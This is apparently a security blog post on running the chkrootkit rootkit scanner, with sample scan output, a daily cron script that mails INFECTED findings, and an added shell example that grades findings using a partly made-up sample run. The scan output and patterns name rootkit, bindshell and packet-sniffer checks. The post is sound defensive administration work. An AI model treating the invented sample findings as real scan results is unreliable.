/tmp/pear/download/PEAR-1.9.4/PEAR/Command/Package.php
/tmp/pear/download/PEAR-1.9.4/PEAR/PackageFile.php
/tmp/pear/download/PEAR-1.9.4/PEAR/RunTest.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Autoloader.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Frontend.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Validate.php
/tmp/pear/download/PEAR-1.9.4/PEAR/ErrorStack.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Task/Replace/rw.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Task/Unixeol/rw.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Task/Postinstallscript.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Task/Windowseol/rw.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Task/Replace.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Task/Unixeol.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Task/Windowseol.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Task/Common.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Task/Postinstallscript/rw.php
/tmp/pear/download/PEAR-1.9.4/PEAR/ChannelFile/Parser.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Common.php
/tmp/pear/download/PEAR-1.9.4/PEAR/XMLParser.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Downloader.php
/tmp/pear/download/PEAR-1.9.4/PEAR/DependencyDB.php
/tmp/pear/download/PEAR-1.9.4/PEAR/PackageFile/v2.php
/tmp/pear/download/PEAR-1.9.4/PEAR/PackageFile/v2/rw.php
/tmp/pear/download/PEAR-1.9.4/PEAR/PackageFile/v2/Validator.php
/tmp/pear/download/PEAR-1.9.4/PEAR/PackageFile/Generator/v2.php
/tmp/pear/download/PEAR-1.9.4/PEAR/PackageFile/Generator/v1.php
/tmp/pear/download/PEAR-1.9.4/PEAR/PackageFile/v1.php
/tmp/pear/download/PEAR-1.9.4/PEAR/PackageFile/Parser/v2.php
/tmp/pear/download/PEAR-1.9.4/PEAR/PackageFile/Parser/v1.php
/tmp/pear/download/PEAR-1.9.4/PEAR/REST.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Command.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Dependency2.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Exception.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Frontend/CLI.php
/tmp/pear/download/PEAR-1.9.4/PEAR/ChannelFile.php
/tmp/pear/download/PEAR-1.9.4/scripts/peclcmd.php
/tmp/pear/download/PEAR-1.9.4/scripts/pearcmd.php
/tmp/pear/download/PEAR-1.9.4/System.php
/tmp/pear/download/PEAR-1.9.4/PEAR.php
/tmp/pear/download/PEAR-1.9.4/OS/Guess.php
/tmp/pear/download/Console_Getopt-1.3.1/Console/Getopt.php
/tmp/pear/download/Structures_Graph-1.0.3/tests/testCase/BasicGraph.php
/tmp/pear/download/Structures_Graph-1.0.3/tests/AllTests.php
/tmp/pear/download/Structures_Graph-1.0.3/Structures/Graph.php
/tmp/pear/download/Structures_Graph-1.0.3/Structures/Graph/Node.php
/tmp/pear/download/Structures_Graph-1.0.3/Structures/Graph/Manipulator/AcyclicTest.php
/tmp/pear/download/Structures_Graph-1.0.3/Structures/Graph/Manipulator/TopologicalSorter.php

Searching for anomalies in shell history files... Warning: `//root/.mysql_history' is linked to another file
Checking `asp'... not infected
Checking `bindshell'... not infected
Checking `lkm'... chkproc: nothing detected
chkdirs: nothing detected
Checking `rexedcs'... not found
Checking `sniffer'... eth0: not promisc and no PF_PACKET sockets
Checking `w55808'... not infected
Checking `wted'... chkwtmp: nothing deleted
Checking `scalper'... not infected
Checking `slapper'... not infected
Checking `z2'... chklastlog: nothing deleted
Checking `chkutmp'... chkutmp: nothing deleted
Checking `OSX_RSPLUG'... not infected

None of the files listed above are a problem; if INFECTED shows up, be careful.
./chkrootkit | grep INFECTED

3. Automated runs

Create a script to run daily that mails a report automatically when a problem is found
vi chkrootkitcron.sh

#!/bin/bash
TOOLKITSPATH=/usr/local
MAILUSER=root@localhost
file_chkrootkit_log=chkrootkitcron.log
servername=$(hostname)
date=$(date +%Y-%m-%d)

# chkrootkit expects to be run from its own directory
cd ${TOOLKITSPATH}/chkrootkit || exit 1
./chkrootkit > ${file_chkrootkit_log}
# mail the INFECTED lines only when at least one is present
[ -n "$(grep INFECTED ${file_chkrootkit_log})" ] && \
grep INFECTED ${file_chkrootkit_log} | mail -s "[chkrootkit] report in ${servername} ${date}" ${MAILUSER}

Add it to crontab:

echo "40 5 * * * cd /opt/shell && /bin/sh ./chkrootkitcron.sh > /dev/null 2>&1" >> /var/spool/cron/root
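The cron script above mails only INFECTED lines, yet the run shown earlier also printed a Warning: about /root/.mysql_history that such a grep drops. The following added example, which is not from the original post or the chkrootkit project, classifies a saved chkrootkit run into CRITICAL (INFECTED) and WARNING (Warning:, packet sniffer) findings and reports the highest level; the sample run is constructed from lines of the output above plus one made-up INFECTED line and one made-up sniffer line, and the function names are my own.

```shell
#!/bin/sh
# Added example, not from the original post or the chkrootkit project: classify
# a chkrootkit run into CRITICAL and WARNING findings instead of grepping for
# INFECTED alone. Function names are my own.

# Constructed sample run: real lines from the output shown above, plus one
# INFECTED line and one packet-sniffer line made up for the demonstration.
sample_run() {
cat <<'EOF'
ROOTDIR is `/'
Checking `basename'... not infected
Checking `ifconfig'... INFECTED
Checking `lkm'... chkproc: nothing detected
Searching for anomalies in shell history files... Warning: `//root/.mysql_history' is linked to another file
Checking `sniffer'... eth0: PACKET SNIFFER(/usr/sbin/tcpdump[4242])
Checking `wted'... chkwtmp: nothing deleted
EOF
}

# stdin: chkrootkit output. Prints "CRITICAL <line>" for INFECTED results and
# "WARNING <line>" for chkrootkit warnings and interfaces with a sniffer.
chkrootkit_alerts() {
    awk '
        /INFECTED/       { print "CRITICAL " $0; next }
        /PACKET SNIFFER/ { print "WARNING " $0; next }
        /Warning:/       { print "WARNING " $0; next }
    '
}

# stdin: chkrootkit output. Prints 2 if any CRITICAL, 1 if only WARNING, else 0.
highest_level() {
    chkrootkit_alerts | awk '
        BEGIN { level = 0 }
        $1 == "CRITICAL" && level < 2 { level = 2 }
        $1 == "WARNING"  && level < 1 { level = 1 }
        END { print level }
    '
}

# Daily use: run the real scan from its install directory and mail the
# classified findings when there are any (same MAILUSER idea as the cron
# script above, here read from the environment with a default). The return
# code is the level, so cron wrappers can branch on it.
daily_report() {
    dir=${1:-/usr/local/chkrootkit}
    mailto=${MAILUSER:-root@localhost}
    log=$(cd "$dir" && ./chkrootkit 2>&1) || return 1
    level=$(printf '%s\n' "$log" | highest_level)
    if [ "$level" -gt 0 ]; then
        printf '%s\n' "$log" | chkrootkit_alerts | \
            mail -s "[chkrootkit] level $level on $(hostname) $(date +%Y-%m-%d)" "$mailto"
    fi
    return "$level"
}

sample_run | chkrootkit_alerts
echo "highest level: $(sample_run | highest_level)"
```

On the constructed sample this lists one CRITICAL and two WARNING lines and reports level 2; in the cron job, call `daily_report /usr/local/chkrootkit` in place of the grep pipeline.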

Posted in 安全.
